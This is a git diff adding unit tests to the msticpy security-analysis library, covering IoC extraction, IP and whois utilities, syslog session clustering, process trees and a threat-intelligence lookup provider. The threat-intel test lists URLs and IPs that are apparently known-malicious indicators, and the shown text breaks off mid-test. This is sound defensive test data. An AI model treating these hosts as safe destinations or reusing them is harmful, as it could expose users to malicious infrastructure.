+        self.assertEqual(output_df[output_df["IoCType"] == "ipv6"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "url"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "windows_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "linux_path"].shape[0], 8)
+        self.assertEqual(output_df[output_df["IoCType"] == "md5_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha1_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha256_hash"].shape[0], 3)
+
+    def test_dataframe_ioc_types(self):
+
+        input_df = pd.DataFrame.from_dict(
+            data=TEST_CASES, orient="index", columns=["input"]
+        )
+        output_df = self.extractor.extract(
+            data=input_df, columns=["input"], ioc_types=["ipv4", "url", "md5_hash"]
+        )
+
+        self.assertGreater(output_df.shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv4"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv6"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "url"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "windows_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "linux_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "md5_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha1_hash"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha256_hash"].shape[0], 0)
+
+    def test_dataframe_new(self):
+
+        input_df = pd.DataFrame.from_dict(
+            data=TEST_CASES, orient="index", columns=["input"]
+        )
+        output_df = self.extractor.extract_df(
+            data=input_df, columns=["input"], include_paths=True
+        )
+
+        self.assertGreater(output_df.shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv4"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv6"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "url"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "windows_path"].shape[0], 6)
+        self.assertEqual(output_df[output_df["IoCType"] == "linux_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "md5_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha1_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha256_hash"].shape[0], 3)
+
+        input_df = pd.DataFrame.from_dict(
+            data=TEST_CASES, orient="index", columns=["input"]
+        )
+        ioc_types = [
+            "ipv4",
+            "ipv6",
+            "url",
+            "linux_path",
+            "md5_hash",
+            "sha1_hash",
+            "sha256_hash",
+        ]
+        output_df = self.extractor.extract_df(
+            data=input_df, columns=["input"], include_paths=True, ioc_types=ioc_types
+        )
+        # for _, row in output_df[output_df['IoCType'] == 'url'].iterrows():
+        #     print(row.Observable)
+        self.assertGreater(output_df.shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv4"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv6"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "url"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "windows_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "linux_path"].shape[0], 8)
+        self.assertEqual(output_df[output_df["IoCType"] == "md5_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha1_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha256_hash"].shape[0], 3)
+
+    def test_dataframe_ioc_types_new(self):
+
+        input_df = pd.DataFrame.from_dict(
+            data=TEST_CASES, orient="index", columns=["input"]
+        )
+        output_df = self.extractor.extract_df(
+            data=input_df, columns=["input"], ioc_types=["ipv4", "url", "md5_hash"]
+        )
+
+        self.assertGreater(output_df.shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv4"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv6"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "url"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "windows_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "linux_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "md5_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha1_hash"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha256_hash"].shape[0], 0)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/sectools/test_ip_utils.py b/tests/sectools/test_ip_utils.py
new file mode 100644
index 000000000..9868f9bfe
--- /dev/null
+++ b/tests/sectools/test_ip_utils.py
@@ -0,0 +1,93 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""IP Utils test class."""
+import os
+import unittest
+
+import pandas as pd
+from msticpy.sectools.ip_utils import get_ip_type, get_whois_df, get_whois_info
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+
+class TestIpUtils(unittest.TestCase):
+    """Unit test class."""
+
+    IPV4 = {
+        "Private": ("10.0.0.1", ["Private", "Reserved"]),
+        "Multicast": ("224.0.0.1", None),
+        "Unspecified": ("0.0.0.0", None),
+        "Reserved": ("198.51.100.1", ["Private", "Reserved"]),
+        "Loopback": ("127.0.0.1", None),
+        "Public": ("153.2.3.4", None),
+        "Link Local": ("169.254.0.1", None),
+    }
+    IPV6 = {
+        "Private": ("FC00::C001:1DFF:FEE0:0", None),
+        "Multicast": ("FF00::", None),
+        "Unspecified": ("::", None),
+        "Reserved": ("2001:db8::", ["Private", "Reserved"]),
+        "Loopback": ("::1", None),
+        "Public": ("2340:0023:AABA:0A01:0055:5054:9ABC:ABB0", None),
+        "Link Local": ("FE80::C001:1DFF:FEE0:0", None),
+    }
+
+    def setUp(self):
+        input_file = os.path.join(TEST_DATA_PATH, "az_net_flows.csv")
+        self.input_df = pd.read_csv(input_file).sample(10)
+
+    def test_get_ip_type(self):
+
+        for ip_type, (addr, alts) in self.IPV4.items():
+            print(addr, ip_type)
+            if alts:
+                self.assertIn(get_ip_type(addr), alts)
+            else:
+                self.assertEqual(get_ip_type(addr), ip_type)
+        for ip_type, (addr, alts) in self.IPV6.items():
+            print(addr, ip_type)
+            if alts:
+                self.assertIn(get_ip_type(addr), alts)
+            else:
+                self.assertEqual(get_ip_type(addr), ip_type)
+
+    def test_get_whois(self):
+        ms_ip = "13.107.4.50"
+        ms_asn = "MICROSOFT-CORP"
+        asn, _ = get_whois_info(ms_ip)
+        self.assertIn(ms_asn, asn)
+
+        asn, _ = get_whois_info(self.IPV4["Private"][0])
+        invalid_type = "No ASN Information for IP type: Private"
+        self.assertEqual(asn, invalid_type)
+
+    def test_get_whois_df(self):
+        results = get_whois_df(data=self.input_df, ip_column="AllExtIPs")
+        self.assertEqual(len(results), len(self.input_df))
+        self.assertIn("AsnDescription", results.columns)
+
+        results2 = get_whois_df(
+            data=self.input_df, ip_column="AllExtIPs", asn_col="asn", whois_col="whois"
+        )
+        self.assertEqual(len(results2), len(self.input_df))
+        self.assertIn("asn", results2.columns)
+        self.assertIn("whois", results2.columns)
+        self.assertLessEqual(len(results2[~results2["asn"].isna()]), len(self.input_df))
+        self.assertEqual(len(results2[~results2["whois"].isna()]), len(self.input_df))
+
+    def test_whois_pdext(self):
+        results = self.input_df.mp_whois.lookup(ip_column="AllExtIPs")
+        self.assertEqual(len(results), len(self.input_df))
+        self.assertIn("AsnDescription", results.columns)
+
+        results2 = self.input_df.mp_whois.lookup(
+            ip_column="AllExtIPs", asn_col="asn", whois_col="whois"
+        )
+        self.assertEqual(len(results2), len(self.input_df))
+        self.assertIn("asn", results2.columns)
+        self.assertIn("whois", results2.columns)
+        self.assertLessEqual(len(results2[~results2["asn"].isna()]), len(self.input_df))
+        self.assertEqual(len(results2[~results2["whois"].isna()]), len(self.input_df))
diff --git a/tests/sectools/test_linuxsyslog.py b/tests/sectools/test_linuxsyslog.py
new file mode 100644
index 000000000..a06613e1b
--- /dev/null
+++ b/tests/sectools/test_linuxsyslog.py
@@ -0,0 +1,102 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+import os
+from pathlib import Path
+import warnings
+
+import pandas as pd
+import pytest
+from pytest import raises
+
+from msticpy.datamodel.entities import Host
+from msticpy.sectools import syslog_utils as ls
+from msticpy.common.exceptions import MsticpyException
+from msticpy.sectools import cmd_line as cl
+from msticpy.common.provider_settings import get_provider_settings
+from msticpy.sectools.geoip import GeoIPDatabaseException
+
+from ..unit_test_lib import get_test_data_path, custom_mp_config
+
+_TEST_DATA = get_test_data_path()
+
+
+def test_cluster_syslog_logons_df():
+    input_file = os.path.join(_TEST_DATA, "linux_logons.csv")
+    input_df = pd.read_csv(input_file, parse_dates=["TimeGenerated"])
+    output = ls.cluster_syslog_logons_df(input_df)
+    assert len(output.index) >= 1  # nosec
+    with raises(MsticpyException):
+        empty_logons = pd.DataFrame(columns=["TimeGenerated", "SyslogMessage"])
+        ls.cluster_syslog_logons_df(logon_events=empty_logons)
+
+
+@pytest.mark.skipif(
+    os.environ.get("MSTICPY_BUILD_SOURCE", "").casefold() == "fork",
+    reason="External fork.",
+)
+def test_host_data():
+    test_config1 = Path(_TEST_DATA).parent.joinpath("msticpyconfig-test.yaml")
+
+    with custom_mp_config(test_config1):
+        with warnings.catch_warnings():
+            # We want to ignore warnings from missing config
+            warnings.simplefilter("ignore", category=UserWarning)
+
+            syslog_file = os.path.join(_TEST_DATA, "syslog_data.csv")
+            syslog_df = pd.read_csv(syslog_file, parse_dates=["TimeGenerated"])
+            heartbeat_file = os.path.join(_TEST_DATA, "host_hb.csv")
+            heartbeat_df = pd.read_csv(heartbeat_file)
+            az_net_file = os.path.join(_TEST_DATA, "az_net.csv")
+            az_net_df = pd.read_csv(az_net_file)
+            try:
+                host_record = ls.create_host_record(syslog_df, heartbeat_df, az_net_df)
+                assert type(host_record) == Host  # nosec
+                assert host_record.OSType == "Linux"  # nosec
+
+            except GeoIPDatabaseException:
+                # test will fail if no GeoIP database exists or can be downloaded
+                other_provider_settings = get_provider_settings(
+                    config_section="OtherProviders"
+                ).get("GeoIPLite", {})
+                geolite_key = None
+                if other_provider_settings:
+                    geolite_key = other_provider_settings.args.get("AuthKey")
+                if not geolite_key:
+                    warnings.resetwarnings()
+                    warnings.warn(
+                        message=(
+                            "No configuration value found for GeoLite key. "
+                            + "Test test_host_data skipped.",
+                        )
+                    )
+                    return
+                assert False
+
+
+def test_cluster_sudo_sessions():
+    input_file = os.path.join(_TEST_DATA, "sudo_events.csv")
+    input_df = pd.read_csv(input_file, parse_dates=["TimeGenerated"])
+    output = ls.cluster_syslog_logons_df(input_df)
+    assert len(output.index) >= 1  # nosec
+
+
+def test_risky_sudo_sessions():
+    input_file = os.path.join(_TEST_DATA, "sudo_session_test.csv")
+    sudo_events = pd.read_csv(input_file, parse_dates=["TimeGenerated"])
+    risky_actions = cl.risky_cmd_line(events=sudo_events, log_type="Syslog")
+    suspicious_events = cl.cmd_speed(
+        cmd_events=sudo_events, cmd_field="Command", time=60, events=2
+    )
+    sudo_sessions = ls.cluster_syslog_logons_df(logon_events=sudo_events)
+    output = ls.risky_sudo_sessions(
+        risky_actions=risky_actions,
+        suspicious_actions=suspicious_events,
+        sudo_sessions=sudo_sessions,
+    )
+    assert len(output) == 2  # nosec
+    assert type(output) == dict  # nosec
+    with raises(MsticpyException):
+        ls.risky_sudo_sessions(sudo_sessions=sudo_sessions)
diff --git a/tests/sectools/test_process_tree_utils.py b/tests/sectools/test_process_tree_utils.py
new file mode 100644
index 000000000..b3b92d555
--- /dev/null
+++ b/tests/sectools/test_process_tree_utils.py
@@ -0,0 +1,366 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""process tree utils test class."""
+import os
+from pathlib import Path
+
+import nbformat
+from nbconvert.preprocessors import ExecutePreprocessor, CellExecutionError
+import pandas as pd
+import pytest
+
+from msticpy.nbtools.process_tree import build_and_show_process_tree
+from msticpy.sectools import process_tree_utils as pt_util
+from msticpy.sectools import proc_tree_builder as pt_build
+from msticpy.sectools.proc_tree_schema import LX_EVENT_SCH, WIN_EVENT_SCH
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+testdf_win = pd.read_pickle(Path(TEST_DATA_PATH).joinpath("win_proc_test.pkl"))
+testdf_lx = pd.read_pickle(Path(TEST_DATA_PATH).joinpath("linux_proc_test.pkl"))
+testdf_mde_pub = pd.read_pickle(Path(TEST_DATA_PATH).joinpath("mde_proc_pub.pkl"))
+testdf_win_mde = pd.read_csv(
+    Path(TEST_DATA_PATH).joinpath("mde_proc_cs1.csv"),
+    parse_dates=[
+        "CreatedProcessCreationTime",
+        "CreatedProcessFileCreationTime",
+        "InitiatingProcessCreationTime",
+        "InitiatingProcessParentCreationTime",
+        "CreatedProcessParentCreationTimeUtc",
+        "ReportTime",
+        "ReportArrivalTimeUtc",
+        "CreatedProcessReparentingProcessCreationTimeUtc",
+        "CreatedProcessParentCreationTimeUtc",
+        "InitiatingProcessImagePeTimestampUtc",
+        "InitiatingProcessImageLastWriteTimeUtc",
+        "InitiatingProcessImageLastAccessTimeUtc",
+        "InitiatingProcessImageCreationTimeUtc",
+    ],
+)
+
+# MDE Schema
+# CreatedProcessIsElevated,
+# CreatedProcessIntegrityLevel,
+# CreatedProcessAccountSid,
+# CreatedProcessAccountName,
+# CreatedProcessAccountDomainName,
+# CreatedProcessTokenElevationType,
+# CreatedProcessFileMarkOfTheWeb,
+# CreatedProcessCreationTime,
+# CreatedProcessId,
+# CreatedProcessName,
+# CreatedProcessCommandLine,
+# CreatedProcessFileType,
+# CreatedProcessFileCreationTime,
+# CreatedProcessFilePath,
+# CreatedProcessFileSize,
+# CreatedProcessFileMd5,
+# CreatedProcessFileSha256,
+# CreatedProcessFileSha1,
+# InitiatingProcessImageMd5,
+# InitiatingProcessImageSha256,
+# InitiatingProcessImageSha1,
+# InitiatingProcessAccountSid,
+# InitiatingProcessAccountDomainName,
+# InitiatingProcessAccountName,
+# InitiatingProcessCreationTime,
+# InitiatingProcessId,
+# InitiatingProcessName,
+# Process_CommandLine,
+# IsElevatedProcess,
+# InitiatingProcessParentCreationTime,
+# InitiatingProcessParentProcessId,
+# InitiatingProcessParentProcessName,
+# InitiatingProcessIntegrityLevel,
+# InitiatingProcessTokenElevationType,
+# WcdMachineId,
+# SenseMachineGuid,
+# ReportTime,
+# ReportArrivalTimeUtc,
+# ReportGuid,
+# ComputerDnsName,
+# ReportIndex,
+# IsLastInQuota,
+# ClientVersion,
+# IsTestOrg,
+# InitiatingProcessStartKey,
+# ContainerId,
+# CreatedProcessStartKey,
+# CreatedProcessReparentingProcessCreationTimeUtc,
+# CreatedProcessReparentingProcessId,
+# CreatedProcessParentCreationTimeUtc,
+# CreatedProcessParentName,
+# CreatedProcessParentId,
+# CreatedProcessAttributes,
+# InitiatingProcessSource,
+# InitiatingProcessImageFilePath,
+# InitiatingProcessImageFileSizeInBytes,
+# InitiatingProcessImagePeTimestampUtc,
+# InitiatingProcessImageLastWriteTimeUtc,
+# InitiatingProcessImageLastAccessTimeUtc,
+# InitiatingProcessImageCreationTimeUtc,
+# InitiatingProcessAttributes,
+# TruncationPolicy,
+# RbacGroupId,
+# OsVersionK,
+# OsVersion,
+# IsMalformed,
+# InitiatingProcessAccountUpn,
+# InitiatingProcessAccountAzureADId,
+# CreatedProcessAccountUpn,
+# CreatedProcessAccountAzureADId,
+# IsMtpEnabled,
+# TenantId,
+# InitiatingProcessLogonId,
+# LogonId,
+# FirstSeen,
+# InitiatingProcessShowWindow,
+# InitiatingProcessStartupFlags,
+# CreatedProcessShowWindow,
+# CreatedProcessStartupFlags,
+# InitiatingProcessCurrentWorkingDirectory,
+# InitiatingProcessPosixProcessGroupId,
+# InitiatingProcessPosixSessionId,
+# InitiatingProcessPosixEffectiveUser,
+# InitiatingProcessPosixEffectiveGroup,
+# InitiatingProcessPosixAttachedTerminal,
+# InitiatingProcessSignatureStatus,
+# InitiatingProcessSignerType,
+# CreatedProcessSignatureStatus,
+# CreatedProcessSignerType,
+# InitiatingProcessVersionInfoCompanyName,
+# InitiatingProcessVersionInfoProductName,
+# InitiatingProcessVersionInfoProductVersion,
+# InitiatingProcessVersionInfoInternalFileName,
+# InitiatingProcessVersionInfoOriginalFileName,
+# InitiatingProcessVersionInfoFileDescription,
+# CreatedProcessVersionInfoCompanyName,
+# CreatedProcessVersionInfoProductName,
+# CreatedProcessVersionInfoProductVersion,
+# CreatedProcessVersionInfoInternalFileName,
+# CreatedProcessVersionInfoOriginalFileName,
+# CreatedProcessVersionInfoFileDescription
+
+
+def test_build_win_tree():
+    """Test building process tree - no plotting."""
+    p_tree = pt_build.build_process_tree(testdf_win, show_summary=True, debug=True)
+    assert pt_util.get_summary_info(p_tree) == {
+        "Processes": 1010,
+        "RootProcesses": 10,
+        "LeafProcesses": 815,
+        "BranchProcesses": 185,
+        "IsolatedProcesses": 0,
+        "LargestTreeDepth": 7,
+    }
+
+
+def test_build_lx_tree():
+    """Test building process tree - no plotting."""
+    p_tree_l = pt_build.build_process_tree(testdf_lx, show_summary=False, debug=True)
+    assert pt_util.get_summary_info(p_tree_l) == {
+        "Processes": 1029,
+        "RootProcesses": 29,
+        "LeafProcesses": 497,
+        "BranchProcesses": 503,
+        "IsolatedProcesses": 0,
+        "LargestTreeDepth": 5,
+    }
+
+
+def test_build_win_tree_dict_schema():
+    """Test building process tree with custom schema - no plotting."""
+    schema = dict(
+        time_stamp="TimeGenerated",
+        process_name="NewProcessName",
+        process_id="NewProcessId",
+        parent_name="ParentProcessName",
+        parent_id="ProcessId",
+        logon_id="SubjectLogonId",
+        target_logon_id="TargetLogonId",
+        cmd_line="CommandLine",
+        user_name="SubjectUserName",
+        path_separator="\\",
+        user_id="SubjectUserSid",
+        event_id_column="EventID",
+        event_id_identifier=4688,
+        host_name_column="Computer",
+    )
+    p_tree = pt_build.build_process_tree(
+        testdf_win, schema=schema, show_summary=True, debug=True
+    )
+    assert pt_util.get_summary_info(p_tree) == {
+        "Processes": 1010,
+        "RootProcesses": 10,
+        "LeafProcesses": 815,
+        "BranchProcesses": 185,
+        "IsolatedProcesses": 0,
+        "LargestTreeDepth": 7,
+    }
+
+
+def test_tree_utils_win():
+    """Test process tree utils."""
+    p_tree = pt_build.build_process_tree(testdf_win, show_summary=True, debug=True)
+
+    assert len(pt_util.get_roots(p_tree)) == 10
+    t_root = pt_util.get_roots(p_tree).iloc[4]
+    full_tree = pt_util.get_descendents(p_tree, t_root)
+    assert len(full_tree) == 25
+    children = pt_util.get_children(p_tree, t_root)
+    assert len(children) == 13
+
+    depth = full_tree["path"].str.count("/").max() + 1
+    bottom_desc = full_tree[full_tree["path"].str.count("/") == depth - 1].iloc[0]
+
+    assert len(pt_util.get_ancestors(p_tree, bottom_desc)) == 3
+
+    assert isinstance(pt_util.get_parent(p_tree, bottom_desc), pd.Series)
+    assert (
+        pt_util.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()
+    ).all()
+    assert (
+        pt_util.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()
+    ).all()
+    # assert ptutil.build_process_key(bottom_desc) == bottom_desc.name
+
+    assert (pt_util.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()
+
+    children2 = pt_util.get_children(p_tree, t_root, include_source=False)
+    assert len(children2) == len(
+        pt_util.get_siblings(p_tree, children2.iloc[0], include_source=True)
+    )
+    assert len(children2) == (
+        len(pt_util.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1
+    )
+    assert pt_util.get_summary_info(p_tree) == {
+        "Processes": 1010,
+        "RootProcesses": 10,
+        "LeafProcesses": 815,
+        "BranchProcesses": 185,
+        "IsolatedProcesses": 0,
+        "LargestTreeDepth": 7,
+    }
+
+    assert pt_build.infer_schema(p_tree) == WIN_EVENT_SCH
+
+
+def test_tree_utils_lx():
+    """Test process tree utils."""
+    p_tree_l = pt_build.build_process_tree(testdf_lx, show_summary=False, debug=True)
+    assert len(pt_util.get_roots(p_tree_l)) == 29
+    t_root = pt_util.get_roots(p_tree_l).iloc[0]
+    full_tree = pt_util.get_descendents(p_tree_l, t_root)
+    assert len(full_tree) == 901
+    children = pt_util.get_children(p_tree_l, t_root)
+    assert len(children) == 452
+
+    depth = full_tree["path"].str.count("/").max() + 1
+    bottom_desc = full_tree[full_tree["path"].str.count("/") == depth - 1].iloc[0]
+
+    assert len(pt_util.get_ancestors(p_tree_l, bottom_desc)) == 3
+
+    assert isinstance(pt_util.get_parent(p_tree_l, bottom_desc), pd.Series)
+    assert (
+        pt_util.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()
+    ).all()
+    assert (
+        pt_util.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()
+    ).all()
+    # assert ptutil.build_process_key(bottom_desc) == bottom_desc.name
+
+    assert (pt_util.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()
+
+    children2 = pt_util.get_children(p_tree_l, t_root, include_source=False)
+    assert len(children2) == len(
+        pt_util.get_siblings(p_tree_l, children2.iloc[0], include_source=True)
+    )
+    assert len(children2) == (
+        len(pt_util.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1
+    )
+    assert pt_util.get_summary_info(p_tree_l) == {
+        "Processes": 1029,
+        "RootProcesses": 29,
+        "LeafProcesses": 497,
+        "BranchProcesses": 503,
+        "IsolatedProcesses": 0,
+        "LargestTreeDepth": 5,
+    }
+
+    assert pt_build.infer_schema(p_tree_l) == LX_EVENT_SCH
+
+
+def test_build_and_plot_process_tree_win():
+    """Test build and plot process tree."""
+    build_and_show_process_tree(testdf_win, legend_col="NewProcessName")
+
+
+def test_build_and_plot_process_tree_lx():
+    """Test build and plot process tree."""
+    build_and_show_process_tree(testdf_lx, legend_col="NewProcessName")
+
+
+def test_build_and_plot_process_tree_mde():
+    """Test build and plot process tree."""
+    build_and_show_process_tree(testdf_mde_pub, legend_col="FileName")
+
+
+def test_build_mde_win_tree_dict_schema():
+    """Test build MDE process tree."""
+    schema = dict(
+        time_stamp="CreatedProcessCreationTime",
+        process_name="CreatedProcessName",
+        process_id="CreatedProcessId",
+        parent_name="ParentProcessName",
+        parent_id="CreatedProcessParentId",
+        logon_id="InitiatingProcessLogonId",
+        target_logon_id="LogonId",
+        cmd_line="CreatedProcessCommandLine",
+        user_name="CreatedProcessAccountName",
+        path_separator="\\",
+        user_id="CreatedProcessAccountSid",
+        # event_id_column="EventID",
+        # event_id_identifier=4688,
+        host_name_column="ComputerDnsName",
+    )
+    p_tree = pt_build.build_process_tree(
+        testdf_win_mde, schema=schema, show_summary=True, debug=True
+    )
+    assert pt_util.get_summary_info(p_tree) == {
+        "Processes": 1642,
+        "RootProcesses": 9,
+        "LeafProcesses": 1177,
+        "BranchProcesses": 456,
+        "IsolatedProcesses": 0,
+        "LargestTreeDepth": 16,
+    }
+
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "ProcessTree.ipynb"
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+def test_process_tree_notebook():
+    """Run process tree notebook."""
+    nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+    abs_path = Path(_NB_FOLDER).absolute()
+    with open(nb_path, encoding="utf-8") as f:
+        nb = nbformat.read(f, as_version=4)
+    ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+    try:
+        ep.preprocess(nb, {"metadata": {"path": abs_path}})
+    except CellExecutionError:
+        nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+        msg = f"Error executing the notebook '{nb_path}'.\n"
+        msg += f"See notebook '{nb_err}' for the traceback."
+        print(msg)
+        with open(nb_err, mode="w", encoding="utf-8") as f:
+            nbformat.write(nb, f)
+        raise
diff --git a/tests/sectools/test_tiprovider_kql.py b/tests/sectools/test_tiprovider_kql.py
new file mode 100644
index 000000000..3972cad26
--- /dev/null
+++ b/tests/sectools/test_tiprovider_kql.py
@@ -0,0 +1,234 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""TIProviders test class."""
+import unittest
+from datetime import datetime
+from pathlib import Path
+from typing import Any, Dict, Optional, Tuple, Union
+
+import pandas as pd
+from msticpy.data import QueryProvider
+from msticpy.data.data_providers import DriverBase
+from msticpy.sectools.tilookup import TILookup
+from msticpy.sectools.tiproviders import get_provider_settings, AzSTI
+
+from ..unit_test_lib import custom_mp_config, get_test_data_path
+
+_TEST_DATA = get_test_data_path()
+
+
+class Kql_Result:
+    """Mock result."""
+
+
+class KqlTestDriver(DriverBase):
+    """KqlTestDriver class to execute kql queries."""
+
+    def __init__(self, connection_str: str = None, **kwargs):
+        del connection_str
+        super().__init__(**kwargs)
+
+        self._loaded = True
+        self._connected = True
+        self._schema: Dict[str, Any] = {}
+
+        indicator_file = Path(_TEST_DATA).joinpath("as_threatintel")
+        self.test_df = pd.read_pickle(indicator_file)
+        self.ip_df = self.test_df[self.test_df["NetworkIP"].str.len() > 0].copy()
+        self.ip_df["IoC"] = self.ip_df["NetworkIP"].str.lower()
+        self.url_df = self.test_df[self.test_df["Url"].str.len() > 0].copy()
+        self.url_df["IoC"] = self.url_df["Url"].str.lower()
+
+    def connect(self, connection_str: Optional[str] = None, **kwargs):
+        self._connected = True
+        return None
+
+    @property
+    def schema(self) -> Dict[str, Dict]:
+        return self._schema
+
+    def query(
+        self, query: str, query_source: Any = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        del query_source, kwargs
+
+        query_toks = [tok.lower() for tok in query.split("'") if tok != ","]
+        if "where NetworkIP" in query:
+            result_df = self.ip_df[self.ip_df["IoC"].isin(query_toks)]
+            return result_df
+
+        if "where Url" in query:
+            result_df = self.url_df[self.url_df["IoC"].isin(query_toks)]
+            return result_df
+
+        if "empty_result" in query:
+            return pd.DataFrame()
+
+        if "failed_query" in query:
+            query_result = Kql_Result()
+            # pylint: disable=attribute-defined-outside-init
+            query_result.completion_query_info = {"StatusCode": 0}  # type: ignore
+            query_result.records_count = 0  # type: ignore
+            return query_result
+
+        if "no_dataframe" in query:
+            return Kql_Result()
+        return None
+
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        pass
+
+
+class mock_ip:
+    def run_cell_magic(self, *args, **kwargs):
+        del args, kwargs
+
+    def run_line_magic(self, *args, **kwargs):
+        del args
+        if kwargs.get("line") == "--schema":
+            return {}
+
+    def find_magic(self, *args, **kwargs):
+        del args, kwargs
+        return True
+
+
+def get_mock_ip():
+    return mock_ip()
+
+
+class TestASKqlTIProvider(unittest.TestCase):
+    """Unit test class."""
+
+    def setUp(self):
+        test_data_provider = KqlTestDriver()
+        self.qry_prov = QueryProvider(
+            data_environment="LogAnalytics", driver=test_data_provider
+        )
+
+    def test_ti_config_and_load(self):
+        test_config1 = Path(_TEST_DATA).joinpath("msticpyconfig-askql.yaml")
+        with custom_mp_config(test_config1):
+            ti_settings = get_provider_settings()
+
+            self.assertIsInstance(ti_settings, dict)
+            self.assertGreaterEqual(1, len(ti_settings))
+
+            # Try to load TIProviders - should throw a warning on
+            # missing provider class
+            as_byoti_prov = AzSTI(query_provider=self.qry_prov)
+            ti_lookup = TILookup(primary_providers=[as_byoti_prov])
+
+            # should have 2 succesfully loaded providers
+            self.assertGreaterEqual(1, len(ti_lookup.loaded_providers))
+            self.assertGreaterEqual(1, len(ti_lookup.provider_status))
+
+    def load_ti_lookup(self):
+        test_config1 = Path(_TEST_DATA).joinpath("msticpyconfig-askql.yaml").resolve()
+        with custom_mp_config(test_config1):
+            as_byoti_prov = AzSTI(query_provider=self.qry_prov)
+            return TILookup(primary_providers=[as_byoti_prov])
+
+    def test_ASByoti_provider(self):
+        ti_lookup = self.load_ti_lookup()
+
+        end = datetime(2019, 8, 5, 22, 59, 59, 809000)
+        start = datetime(2019, 8, 5, 22, 16, 16, 574000)
+        ioc_url = "http://ajaraheritage.ge/g7cberv"
+        ioc_urls = [
+            "http://cheapshirts.us/zVnMrG.php",
+            "http://chinasymbolic.com/i9jnrc",
+            "http://cetidawabi.com/468fd",
+            "http://append.pl/srh9xsz",
+            "http://aiccard.co.th/dvja1te",
+            "http://ajaraheritage.ge/g7cberv",
+            "http://cic-integration.com/hjy93JNBasdas",
+            "https://google.com",  # benign
+            "https://microsoft.com",  # benign
+            "https://python.org",  # benign
+        ]
+        ioc_ip = "91.219.31.18"
+        ioc_ips = [
+            "185.92.220.35",
+            "213.159.214.86",
+            "77.222.54.202",
+            "91.219.29.81",
+            "193.9.28.254",
+            "89.108.83.196",
+            "91.219.28.44",
+            "188.127.231.124",
+            "192.42.116.41",
+            "91.219.31.18",
+            "46.4.239.76",
+            "188.166.168.250",
+            "195.154.241.208",
+            "51.255.172.55",
+            "93.170.169.52",
+            "104.215.148.63",
+            "13.77.161.179",
+            "40.76.4.15",  # benign
+            "40.112.72.205",
+            "40.113.200.201",  # benign
+        ]
+
